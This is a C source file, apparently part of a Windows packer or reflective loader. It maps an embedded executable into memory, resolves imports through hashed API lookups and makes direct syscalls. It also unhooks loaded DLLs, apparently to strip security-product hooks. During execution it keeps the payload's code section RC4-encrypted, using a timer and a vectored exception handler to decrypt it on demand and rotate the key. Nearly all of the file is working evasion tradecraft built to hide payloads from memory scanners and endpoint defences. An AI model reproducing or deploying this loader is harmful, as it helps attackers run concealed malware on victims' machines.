#include <Windows.h>

#include "Structs.h"
#include "Common.h"
#include "Debug.h"

#define		EXEC_WAIT					0.5		// 0.5 Second
#define		RC4_KEY_SIZE				0x10	// 16 byte

// Data state:
#define		DATA_ENCRYPTED				0x01
#define		DATA_DECRYPTED				0x02

#define		KEY_CHANGE_CYCLE_NMBR		20		// After 20 calls to Rc4EncryptDecrypt (10/10 encryption/decryption) the rc4 key will change

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);
typedef BOOL(WINAPI* MAIN)();

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

extern NT_API	g_Nt;			// Defined in main.c
extern WINAPIs	g_WinAPI;		// Defined in main.c

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

// Initial key:
BYTE				g_Rc4Key[RC4_KEY_SIZE]	= { 0xFF, 0xDD, 0x79, 0x7F, 0x03, 0xA5, 0x87, 0xEF, 0x71, 0x4D, 0xDB, 0x7D, 0xF4, 0x47, 0x77, 0x01 };

ULONG_PTR			g_uPeTextAddress		= NULL;
SIZE_T				g_sPeTextSize			= NULL;
HANDLE				g_hTimer				= NULL;
HANDLE				g_hTimerQueue			= NULL;

DWORD				g_dwDataStatus			= 0x00;				// Used to detemine the state of the injected PE file in memory (encrypted or not)
DWORD				g_dwCycleCounter		= 0x00;				// Used to determine when to change the rc4 key (when g_dwCycleCounter == KEY_CHANGE_CYCLE_NMBR)

CRITICAL_SECTION	g_CriticalSection		= { 0x00 };

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
	Fix the IAT to contain the packed PE's imports
*/
BOOL FixImportAddressTable(IN PIMAGE_DATA_DIRECTORY pEntryImportDataDir, IN PBYTE pPeBaseAddress) {

	// Pointer to an import descriptor for a DLL
	PIMAGE_IMPORT_DESCRIPTOR	pImgDescriptor = NULL;
	// Iterate over the import descriptors
	for (SIZE_T i = 0; i < pEntryImportDataDir->Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {
		// Get the current import descriptor
		pImgDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pPeBaseAddress + pEntryImportDataDir->VirtualAddress + i);
		// If both thunks are NULL, we've reached the end of the import descriptors list
		if (pImgDescriptor->OriginalFirstThunk == NULL && pImgDescriptor->FirstThunk == NULL)
			break;

		// Retrieve information from the current import descriptor
		LPSTR		cDllName					= (LPSTR)(pPeBaseAddress + pImgDescriptor->Name);
		ULONG_PTR	uOriginalFirstThunkRVA		= pImgDescriptor->OriginalFirstThunk;
		ULONG_PTR	uFirstThunkRVA				= pImgDescriptor->FirstThunk;
		SIZE_T		ImgThunkSize				= 0x00;					// Used to move to the next function (iterating through the IAT and INT)
		HMODULE		hModule						= NULL;

		// If OriginalFirstThunk is NULL, fallback to FirstThunk
//		if (uOriginalFirstThunkRVA == NULL)
//			uOriginalFirstThunkRVA = uFirstThunkRVA;

		if (!(hModule = g_WinAPI.pLoadLibraryA(cDllName)))
			return FALSE;

		// Iterate over the imported functions for the current DLL
		while (TRUE) {

			// Get pointers to the first thunk and original first thunk data
			PIMAGE_THUNK_DATA			pOriginalFirstThunk = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uOriginalFirstThunkRVA + ImgThunkSize);
			PIMAGE_THUNK_DATA			pFirstThunk = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uFirstThunkRVA + ImgThunkSize);
			PIMAGE_IMPORT_BY_NAME		pImgImportByName = NULL;
			ULONG_PTR					pFuncAddress = NULL;

			// At this point both 'pOriginalFirstThunk' & 'pFirstThunk' will have the same values
			// However, to populate the IAT (pFirstThunk), one should use the INT (pOriginalFirstThunk) to retrieve the 
			// functions addresses and patch the IAT (pFirstThunk->u1.Function) with the calculated address.
			if (pOriginalFirstThunk->u1.Function == NULL && pFirstThunk->u1.Function == NULL) {
				break;
			}


			// If the ordinal flag is set, import the function by its ordinal number
			if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) {
				// Since our GetProcAddressH function doesn't support ordinals as input, one can fetch the function address via the following code:

				// Retrieve required headers of the loaded DLL module
				PIMAGE_NT_HEADERS		_pImgNtHdrs					= NULL;
				PIMAGE_EXPORT_DIRECTORY	_pImgExportDir				= NULL;
				PDWORD					_pdwFunctionAddressArray	= NULL;

				_pImgNtHdrs = ((ULONG_PTR)hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew);
				if (_pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
					return FALSE;

				_pImgExportDir				= (PIMAGE_EXPORT_DIRECTORY)(((ULONG_PTR)hModule) + _pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
				_pdwFunctionAddressArray	= (PDWORD)((ULONG_PTR)hModule + _pImgExportDir->AddressOfFunctions);
				// Use the ordinal to retrieve the function address
				pFuncAddress				= ((ULONG_PTR)hModule + _pdwFunctionAddressArray[pOriginalFirstThunk->u1.Ordinal]);

				if (!pFuncAddress) {
#ifdef DEBUG
					PRINT("[!] Could Not Import !%s#%d - %s.%d \n", cDllName, (int)pOriginalFirstThunk->u1.Ordinal, GET_FILENAME(__FILE__), __LINE__);
#endif 
					return FALSE;
				}

			}
			// Import function by name
			else {
				pImgImportByName = (PIMAGE_IMPORT_BY_NAME)((SIZE_T)pPeBaseAddress + pOriginalFirstThunk->u1.AddressOfData);
				if (!(pFuncAddress = (ULONG_PTR)GetProcAddressH(hModule, HASH(pImgImportByName->Name)))) {
#ifdef DEBUG
					PRINT("[!] Could Not Import !%s.%s - %s.%d \n", cDllName, pImgImportByName->Name, GET_FILENAME(__FILE__), __LINE__);
#endif
					return FALSE;
				}
			}

			// Install the function address in the IAT
			pFirstThunk->u1.Function = (ULONGLONG)pFuncAddress;

			// Move to the next function in the IAT/INT array
			ImgThunkSize += sizeof(IMAGE_THUNK_DATA);

		}
	}

	return TRUE;
}


//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
	Relocate the packed PE after injection
*/
BOOL FixReloc(IN PIMAGE_DATA_DIRECTORY pEntryBaseRelocDataDir, IN ULONG_PTR pPeBaseAddress, IN ULONG_PTR pPreferableAddress) {

	// Pointer to the beginning of the base relocation block.
	PIMAGE_BASE_RELOCATION pImgBaseRelocation = (pPeBaseAddress + pEntryBaseRelocDataDir->VirtualAddress);

	// The difference between the current PE image base address and its preferable base address.
	ULONG_PTR uDeltaOffset = pPeBaseAddress - pPreferableAddress;

	// Pointer to individual base relocation entries.
	PBASE_RELOCATION_ENTRY pBaseRelocEntry = NULL;

	// Iterate through all the base relocation blocks.
	while (pImgBaseRelocation->VirtualAddress) {

		// Pointer to the first relocation entry in the current block.
		pBaseRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgBaseRelocation + 1);

		// Iterate through all the relocation entries in the current block.
		while ((PBYTE)pBaseRelocEntry != (PBYTE)pImgBaseRelocation + pImgBaseRelocation->SizeOfBlock) {
			// Process the relocation entry based on its type.
			switch (pBaseRelocEntry->Type) {

				case IMAGE_REL_BASED_DIR64: {
					// Adjust a 64-bit field by the delta offset.
					*((ULONG_PTR*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += uDeltaOffset;
					break;
				}
				case IMAGE_REL_BASED_HIGHLOW: {
					// Adjust a 32-bit field by the delta offset.
					*((DWORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += (DWORD)uDeltaOffset;
					break;
				}
				case IMAGE_REL_BASED_HIGH: {
					// Adjust the high 16 bits of a 32-bit field.
					*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += HIWORD(uDeltaOffset);
					break;
				}
				case IMAGE_REL_BASED_LOW: {
					// Adjust the low 16 bits of a 32-bit field.
					*((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += LOWORD(uDeltaOffset);
					break;
				}
				case IMAGE_REL_BASED_ABSOLUTE: {
					// No relocation is required.
					break;
				}
				default: {
#ifdef DEBUG
					PRINT("[!] Unknown relocation type: %d | Offset: 0x%08X - %s.%d\n", pBaseRelocEntry->Type, pBaseRelocEntry->Offset, GET_FILENAME(__FILE__), __LINE__);
#endif
					return FALSE;
				}
			
			}

			pBaseRelocEntry++;
		}

		pImgBaseRelocation = (PIMAGE_BASE_RELOCATION)pBaseRelocEntry;
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
	Set memory permissions to the injected PE's sections
*/
BOOL FixMemPermissions(IN ULONG_PTR pPeBaseAddress, IN PIMAGE_NT_HEADERS pImgNtHdrs, IN PIMAGE_SECTION_HEADER pImgSecHdr) {

	// Loop through each section of the PE image.
	for (DWORD i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++) {

		NTSTATUS	STATUS				= 0x00;
		DWORD		dwProtection		= 0x00,
					dwOldProtection		= 0x00;
		PVOID		pAddress			= (PVOID)(pPeBaseAddress + pImgSecHdr[i].VirtualAddress);
		SIZE_T		sSize				= (SIZE_T)pImgSecHdr[i].SizeOfRawData;

		// Skip the section if it has no data or no associated virtual address.
		if (!pImgSecHdr[i].SizeOfRawData || !pImgSecHdr[i].VirtualAddress)
			continue;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE)
			dwProtection = PAGE_WRITECOPY;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)
			dwProtection = PAGE_READONLY;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_READWRITE;

		if (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE)
			dwProtection = PAGE_EXECUTE;

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE))
			dwProtection = PAGE_EXECUTE_WRITECOPY;

		// If memory should be RX, we save its base address and size
		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ)) {
			// Save RX base address
			if (!g_uPeTextAddress)
				g_uPeTextAddress = pPeBaseAddress + pImgSecHdr[i].VirtualAddress;

			// Save the RX memory size
			if (!g_sPeTextSize)
				g_sPeTextSize = pImgSecHdr[i].SizeOfRawData;

			dwProtection = PAGE_EXECUTE_READ;
		}

		if ((pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_WRITE) && (pImgSecHdr[i].Characteristics & IMAGE_SCN_MEM_READ))
			dwProtection = PAGE_EXECUTE_READWRITE;

		// Apply the determined memory protection to the section.
		SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
		if (!NT_SUCCESS(STATUS = RunSyscall(NtCurrentProcess(), &pAddress, &sSize, dwProtection, &dwOldProtection))) {
#ifdef DEBUG
			PRINT("[!] NtProtectVirtualMemory[%d] Failed At Address [ 0x%p ] With Error: 0x%0.8X - %s.%d \n", i, pAddress, STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif
			return FALSE;
		}
	}

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
	Function that rc4 encrypts/decrypt a given chunk of memory
*/

BOOL Rc4EncryptDecrypt(IN PBYTE pBuffer, IN DWORD dwBufferLen, IN BOOL bDecrypt) {

	// Enter a critical section
	g_WinAPI.pEnterCriticalSection(&g_CriticalSection);

	NTSTATUS				STATUS					= NULL;
	USTRING					uStrBuffer				= { .Buffer = pBuffer,  .Length = dwBufferLen,  .MaximumLength = dwBufferLen };
	USTRING					uStrKey					= { .Buffer = g_Rc4Key, .Length = RC4_KEY_SIZE, .MaximumLength = RC4_KEY_SIZE };
	DWORD					dwOldProtection			= 0x00;
	PVOID					pTmpBuffer				= (PVOID)pBuffer;
	SIZE_T					sTmpBufferLen			= (SIZE_T)dwBufferLen;
	BYTE					bSeed					= 0x00;

	if (!pTmpBuffer || !sTmpBufferLen)
		return FALSE;

	// Change the target's memory permissions to RW to allow encrypting (it was RO)
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	if (!NT_SUCCESS(STATUS = RunSyscall(NtCurrentProcess(), &pTmpBuffer, &sTmpBufferLen, PAGE_READWRITE, &dwOldProtection))) {
#ifdef DEBUG
		PRINT("[!] NtProtectVirtualMemory[1] Failed With Error: 0x%0.8X - %s.%d\n", STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif
		return FALSE;
	}
	

	// Increment the global counters:
	// This will help in determining the data state in memory.
	g_dwDataStatus++;
	// When g_dwCycleCounter == KEY_CHANGE_CYCLE_NMBR, the rc4 key is changed
	g_dwCycleCounter++;

	// Set a new seed that can be used for the new rc4 key
	if (g_dwDataStatus == DATA_DECRYPTED) {
		bSeed = pBuffer[bSeed % 0xFF];
	}

	// Encrypt/Decrypt input data
	if (!NT_SUCCESS((STATUS = g_WinAPI.pSystemFunction032(&uStrBuffer, &uStrKey))) != 0x0) {
#ifdef DEBUG
		PRINT("[!] Rc4EncryptDecrypt.SystemFunction032 Failed With Error: 0x%0.8X - %s.%d\n", STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif 
		return FALSE;
	}

	// Change the rc4 key 
	// Note that one should make sure that the PE is decrypted when changing the key. Else, one can decrypt using a different key than the one was used for encryption resulting in corrupted data.
	if (g_dwCycleCounter >= KEY_CHANGE_CYCLE_NMBR && g_dwDataStatus == DATA_DECRYPTED) {
#ifdef DEBUG
		PRINT("[i] New Key Generated By Seed [0x%0.2X] : ", bSeed);
#endif 
		// Fast algorithm to completely change the rc4 key
		for (int i = 0; i < RC4_KEY_SIZE; i++) {

			if (i % 2 == 0x00)
				g_Rc4Key[i] = g_Rc4Key[i] ^ ((pBuffer[i] ^ bSeed) % 0xFF);
			else
				g_Rc4Key[i] = g_Rc4Key[i] ^ ((g_Rc4Key[0] ^ bSeed) % 0xFF);
#ifdef DEBUG
			PRINT("0x%0.2X ", g_Rc4Key[i]);
#endif 
		}

#ifdef DEBUG
		PRINT("\n");
#endif

		// Reset the counter 
		g_dwCycleCounter = 0x00;
	}

	// Reset the counter 
	if (g_dwDataStatus == DATA_DECRYPTED)
		g_dwDataStatus = 0x00;

	// Change the memory permissions to RO/RX.
	SET_SYSCALL(g_Nt.NtProtectVirtualMemory);
	if (!NT_SUCCESS(STATUS = RunSyscall(NtCurrentProcess(), &pTmpBuffer, &sTmpBufferLen, (bDecrypt == TRUE ? PAGE_EXECUTE_READ : PAGE_READONLY), &dwOldProtection))) {
#ifdef DEBUG
		PRINT("[!] NtProtectVirtualMemory[1] Failed With Error: 0x%0.8X - %s.%d\n", STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif
		return FALSE;
	}
	
	// Leave the critical section
	g_WinAPI.pLeaveCriticalSection(&g_CriticalSection);

	return TRUE;
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

// A callback function called by the 'CreateTimerQueueTimer' winapi that will encrypt the data at 'g_uPeTextAddress' 
VOID CALLBACK ObfuscationTimerCallback(IN PVOID lpParameter, IN BOOLEAN TimerOrWaitFired) {

	Rc4EncryptDecrypt(g_uPeTextAddress, g_sPeTextSize, FALSE);
}

//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

BOOL LocalPeExecAndFluctuate(IN PPE_HDRS pPeHdrs) {

	if (!pPeHdrs)
		return FALSE;

	NTSTATUS		STATUS						= 0x00;
	PBYTE			pPeBaseAddress				= NULL;
	SIZE_T			sPeSize						= (SIZE_T)pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage;
	PVOID			pVectoredExptnHandler		= NULL,
					pEntryPoint					= NULL;
	DLLMAIN			pDllMain					= NULL;
	MAIN			pMain						= NULL;

	// Initialize a critical section (used in Rc4EncryptDecrypt)
	g_WinAPI.pInitializeCriticalSection(&g_CriticalSection);

	// Allocate enough memory to hold the decompressed pe
	SET_SYSCALL(g_Nt.NtAllocateVirtualMemory);
	if (!NT_SUCCESS(STATUS = RunSyscall(NtCurrentProcess(), &pPeBaseAddress, 0x00, &sPeSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE))) {
#ifdef DEBUG
		PRINT("[!] NtAllocateVirtualMemory Failed With Error: 0x%0.8X - %s.%d \n", STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif
		return FALSE;
	}

	// Calculate the entry point
	pEntryPoint = (PVOID)(pPeBaseAddress + pPeHdrs->pImgNtHdrs->OptionalHeader.AddressOfEntryPoint);

	// Move the pe's section to the allocated memory
	for (int i = 0; i < pPeHdrs->pImgNtHdrs->FileHeader.NumberOfSections; i++) {
		Memcpy(
			(PVOID)(pPeBaseAddress + pPeHdrs->pImgSecHdr[i].VirtualAddress),
			(PVOID)((ULONG_PTR)pPeHdrs->pFileBuffer + pPeHdrs->pImgSecHdr[i].PointerToRawData),
			pPeHdrs->pImgSecHdr[i].SizeOfRawData
		);
	}

	// Set up the IAT
	if (!FixImportAddressTable(pPeHdrs->pEntryImportDataDir, pPeBaseAddress))
		return FALSE;

	// Fix relocation
	if (!FixReloc(pPeHdrs->pEntryBaseRelocDataDir, pPeBaseAddress, pPeHdrs->pImgNtHdrs->OptionalHeader.ImageBase))
		return FALSE;

	// Set memory permissions. The 'FixMemPermissions' function will initialize the 'g_uPeTextAddress' and 'g_sPeTextSize' global variables
	if (!FixMemPermissions(pPeBaseAddress, pPeHdrs->pImgNtHdrs, pPeHdrs->pImgSecHdr))
		return FALSE;

#ifdef DEBUG
	PRINT("[i] Applying PeFluctuation On 0x%p For %ld Bytes\n", g_uPeTextAddress, g_sPeTextSize);
#endif

	if (!g_uPeTextAddress || !g_sPeTextSize)
		return FALSE;

	// Set up a VEH that will execute 'UnhookingVectoredExceptionHandler' if an exception is triggered while unhooking
	if (!(pVectoredExptnHandler = g_WinAPI.pAddVectoredExceptionHandler(0x01, UnhookingVectoredExceptionHandler))) {
#ifdef DEBUG
		PRINT("[!] AddVectoredExceptionHandler Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
		return FALSE;
	}
	
	// Unhooking loaded dlls
	UnhookAllLoadedDlls();

	// Removing the set VEH
	if (!g_WinAPI.pRemoveVectoredExceptionHandler(pVectoredExptnHandler)) {
#ifdef DEBUG
		PRINT("[!] RemoveVectoredExceptionHandler Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
		return FALSE;
	}

	// Resolve the PE's exception handlers if found
	if (pPeHdrs->pEntryExceptionDataDir->Size) {

		PIMAGE_RUNTIME_FUNCTION_ENTRY pImgRuntimeFuncEntry = (PIMAGE_RUNTIME_FUNCTION_ENTRY)(pPeBaseAddress + pPeHdrs->pEntryExceptionDataDir->VirtualAddress);

		if (!g_WinAPI.pRtlAddFunctionTable(pImgRuntimeFuncEntry, (pPeHdrs->pEntryExceptionDataDir->Size / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY)) - 1, pPeBaseAddress)) {
#ifdef DEBUG
			PRINT("[!] RtlAddFunctionTable Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
//			return FALSE;
		}
	}

	// Set up a VEH that will run PeFluctuationVectoredExceptionHandler when an exception occures while executing the PE
	if (!(pVectoredExptnHandler = g_WinAPI.pAddVectoredExceptionHandler(0x01, PeFluctuationVectoredExceptionHandler))) {
#ifdef DEBUG
		PRINT("[!] AddVectoredExceptionHandler Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 		return FALSE;
	}


	// Flush instructions
	SET_SYSCALL(g_Nt.NtFlushInstructionCache);
	if (!NT_SUCCESS(STATUS = RunSyscall(NtCurrentProcess(), NULL, 0x00))) {
#ifdef DEBUG
		PRINT("[!] NtFlushInstructionCache Failed With Error: 0x%0.8X - %s.%d \n", STATUS, GET_FILENAME(__FILE__), __LINE__);
#endif
		return FALSE;
	}

	// Execute TLS callbacks if found
	if (pPeHdrs->pEntryTLSDataDir->Size) {

		PIMAGE_TLS_DIRECTORY		pImgTlsDirectory	= (PIMAGE_TLS_DIRECTORY)(pPeBaseAddress + pPeHdrs->pEntryTLSDataDir->VirtualAddress);
		PIMAGE_TLS_CALLBACK*		pImgTlsCallback		= (PIMAGE_TLS_CALLBACK*)(pImgTlsDirectory->AddressOfCallBacks);

		for (; *pImgTlsCallback; pImgTlsCallback++)
			(*pImgTlsCallback)((LPVOID)pPeBaseAddress, DLL_PROCESS_ATTACH, NULL);
	}

	// Free 'pPeHdrs->pFileBuffer', which is the base address of the decompressed PE
	LocalFree(pPeHdrs->pFileBuffer);

	// Create a timer queue
	if (!(g_hTimerQueue = g_WinAPI.pCreateTimerQueue())) {
#ifdef DEBUG
		PRINT("[!] CreateTimerQueue Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
		return FALSE;
	}

	// Use the timer queue created to execute the 'ObfuscationTimerCallback' callback function after 'EXEC_WAIT' seconds to encrypt memory at 'g_uPeTextAddress'
	if (!g_WinAPI.pCreateTimerQueueTimer(&g_hTimer, g_hTimerQueue, (WAITORTIMERCALLBACK)ObfuscationTimerCallback, NULL, EXEC_WAIT * 1000, 0, 0)) {
#ifdef DEBUG
		PRINT("[!] CreateTimerQueueTimer Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
		return FALSE;
	}

	// Execute the EP
#ifdef DEBUG
	PRINT("[*] Executing Entry Point [ 0x%p ]:\n\n", pEntryPoint);
#endif 

	if (pPeHdrs->bIsDLLFile && (pDllMain = (DLLMAIN)pEntryPoint))
		return pDllMain((HINSTANCE)pPeBaseAddress, DLL_PROCESS_ATTACH, NULL);
	if ((pMain = (MAIN)pEntryPoint))
		return pMain();
}


//--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

LONG WINAPI PeFluctuationVectoredExceptionHandler(PEXCEPTION_POINTERS pExceptionInfo) 
{
	// Check the exception code
	if (pExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {

		// Check the execption address. If the exception address is comming from inside of the RX (.text) memory, its handled
		if (pExceptionInfo->ExceptionRecord->ExceptionAddress >= g_uPeTextAddress && pExceptionInfo->ExceptionRecord->ExceptionAddress <= (g_uPeTextAddress + g_sPeTextSize)) {

			NTSTATUS	STATUS				= 0x00;
			DWORD		dwOldProtection		= 0x00;
			PVOID		pTmpPeTextAddress	= (PVOID)g_uPeTextAddress;
			SIZE_T		sTmpPeTextSize		= (SIZE_T)g_sPeTextSize;


			if (!g_hTimerQueue || !g_hTimer)
				goto _FAILURE;

			// Decrypt the PE's encrypted data - and allow execution
			if (!Rc4EncryptDecrypt(g_uPeTextAddress, g_sPeTextSize, TRUE))
				goto _FAILURE;
			
			// Execute the 'ObfuscationTimerCallback' callback function after 'EXEC_WAIT' seconds to re-encrypt 
			if (!g_WinAPI.pCreateTimerQueueTimer(&g_hTimer, g_hTimerQueue, (WAITORTIMERCALLBACK)ObfuscationTimerCallback, NULL, EXEC_WAIT * 1000, 0, 0)) {
#ifdef DEBUG
				PRINT("[!] CreateTimerQueueTimer Failed With Error: %d - %s.%d\n", GetLastError(), GET_FILENAME(__FILE__), __LINE__);
#endif 
				goto _FAILURE;
			}

			return EXCEPTION_CONTINUE_EXECUTION;
		}
	}

#ifdef DEBUG
	PRINT("[!] UnHandled Exception Raised [!] \n");
	PRINT("\t> At Address: [ 0x%p ]\n", pExceptionInfo->ExceptionRecord->ExceptionAddress);
	PRINT("\t> Exception Code: [ 0x%0.8X ]\n", pExceptionInfo->ExceptionRecord->ExceptionCode);
#endif 


_FAILURE:
	return EXCEPTION_CONTINUE_SEARCH;
}